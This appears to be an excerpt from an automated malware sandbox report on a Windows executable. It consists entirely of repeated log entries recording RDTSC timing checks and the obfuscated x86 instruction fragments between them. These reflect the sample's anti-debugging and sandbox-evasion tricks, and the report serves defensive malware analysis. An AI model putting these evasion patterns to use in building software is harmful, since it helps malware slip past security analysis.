                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F5C second address: 436F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE311181225h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F7D second address: 436F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F83 second address: 436F8D instructions: 0x00000000 rdtsc 0x00000002 je 00007FE31118121Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4370D4 second address: 4370DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4370DA second address: 4370DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3DEA4D second address: 3DEA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FE310CDC396h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FE310CDC39Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43C79C second address: 43C7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43C7A2 second address: 43C7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D7FF second address: 43D805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D805 second address: 43D82A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FE310CDC3A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D82A second address: 43D834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE311181216h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43F65C second address: 43F662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43E971 second address: 43E976 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43E976 second address: 43EA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124551CAh], esi 0x00000010 jmp 00007FE310CDC3A7h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+122D2B11h], eax 0x00000022 add dword ptr [ebp+12478BD5h], edi 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FE310CDC398h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov ebx, dword ptr [ebp+1244FDB6h] 0x0000004f mov dword ptr [ebp+122D2F0Ah], esi 0x00000055 mov eax, dword ptr [ebp+122D0261h] 0x0000005b push eax 0x0000005c and ebx, dword ptr [ebp+122D3A39h] 0x00000062 pop ebx 0x00000063 push FFFFFFFFh 0x00000065 and ebx, 7DC4AB26h 0x0000006b nop 0x0000006c jmp 00007FE310CDC39Ah 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE310CDC3A1h 0x00000079 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EA5D1 second address: 3EA5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EA5D5 second address: 3EA5E1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE310CDC396h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC87 second address: 44CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE311181216h 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC92 second address: 44CC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC97 second address: 44CC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C69D second address: 44C6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C6A1 second address: 44C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE31118121Dh 0x0000000d jnp 00007FE311181216h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C6BC second address: 44C6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4530F2 second address: 4530F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4530F8 second address: 45311F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A7h 0x00000009 popad 0x0000000a pop esi 0x0000000b jo 00007FE310CDC3AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45311F second address: 453123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 453C51 second address: 453C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4598EB second address: 4598EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4598EF second address: 45990D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE310CDC3A8h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45990D second address: 459941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE31118121Ch 0x00000008 jmp 00007FE311181229h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jc 00007FE31118121Eh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 459DB9 second address: 459DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007FE310CDC396h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45EDC6 second address: 45EDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 461A3F second address: 461A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A7h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FE310CDC3A5h 0x0000000f popad 0x00000010 jmp 00007FE310CDC3A5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE310CDC39Ah 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46774E second address: 467757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46659D second address: 4665A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466871 second address: 46689D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181222h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FE311181222h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B40 second address: 466B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B44 second address: 466B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B49 second address: 466B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466DFF second address: 466E0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE311181216h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466F76 second address: 466F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4670A4 second address: 4670A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4670A8 second address: 4670C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE310CDC39Ah 0x0000000f jnc 00007FE310CDC396h 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4671FF second address: 467207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 467207 second address: 467223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FE310CDC396h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jnc 00007FE310CDC396h 0x0000001b pop eax 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 40C7AC second address: 40C7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181223h 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466036 second address: 46603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46603B second address: 46605B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007FE311181216h 0x0000000b jmp 00007FE31118121Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE311181216h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46605B second address: 46605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46D569 second address: 46D56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46D56D second address: 46D57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE310CDC396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C96C second address: 46C984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FE31118121Ch 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C984 second address: 46C993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C993 second address: 46C9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jp 00007FE311181216h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C9A7 second address: 46C9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE310CDC396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DA0 second address: 473DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE311181228h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DBD second address: 473DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DD3 second address: 473E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 jmp 00007FE311181226h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007FE311181233h 0x00000016 jmp 00007FE31118121Fh 0x0000001b push eax 0x0000001c jbe 00007FE311181216h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423EC0 second address: 423EC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FA7 second address: 423FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FAB second address: 423FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FCF second address: 423FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240B4 second address: 4240B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240B8 second address: 4240F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007FE31118121Ch 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FE31118121Fh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240F3 second address: 424130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FE310CDC3A1h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007FE310CDC3A0h 0x0000001c pop eax 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42442B second address: 42442F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42442F second address: 424433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42459B second address: 4245AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jg 00007FE311181216h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4245AF second address: 4245B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424AE8 second address: 424AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE31118121Dh 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424AFA second address: 424B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424B00 second address: 424B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E01 second address: 424E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FE310CDC396h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E16 second address: 424E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E1C second address: 40C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE310CDC39Dh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FE310CDC398h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D301Fh] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jbe 00007FE310CDC396h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47315D second address: 473195 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FE311181225h 0x00000008 pop edx 0x00000009 jo 00007FE311181233h 0x0000000f jmp 00007FE311181227h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732C5 second address: 4732CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732CB second address: 4732CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732CF second address: 473309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c ja 00007FE310CDC396h 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE310CDC3A4h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473309 second address: 47330F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4770A7 second address: 4770AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4770AB second address: 4770DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE311181222h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FE31118122Fh 0x00000011 jmp 00007FE311181223h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 476D8D second address: 476DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Dh 0x00000007 jng 00007FE310CDC396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push edi 0x00000011 jmp 00007FE310CDC3A1h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jc 00007FE310CDC396h 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E476 second address: 47E47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E47B second address: 47E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E481 second address: 47E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jp 00007FE31118121Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E617 second address: 47E61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 485824 second address: 485841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007FE311181216h 0x0000000c popad 0x0000000d jmp 00007FE311181220h 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484659 second address: 48466A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE310CDC39Ch 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
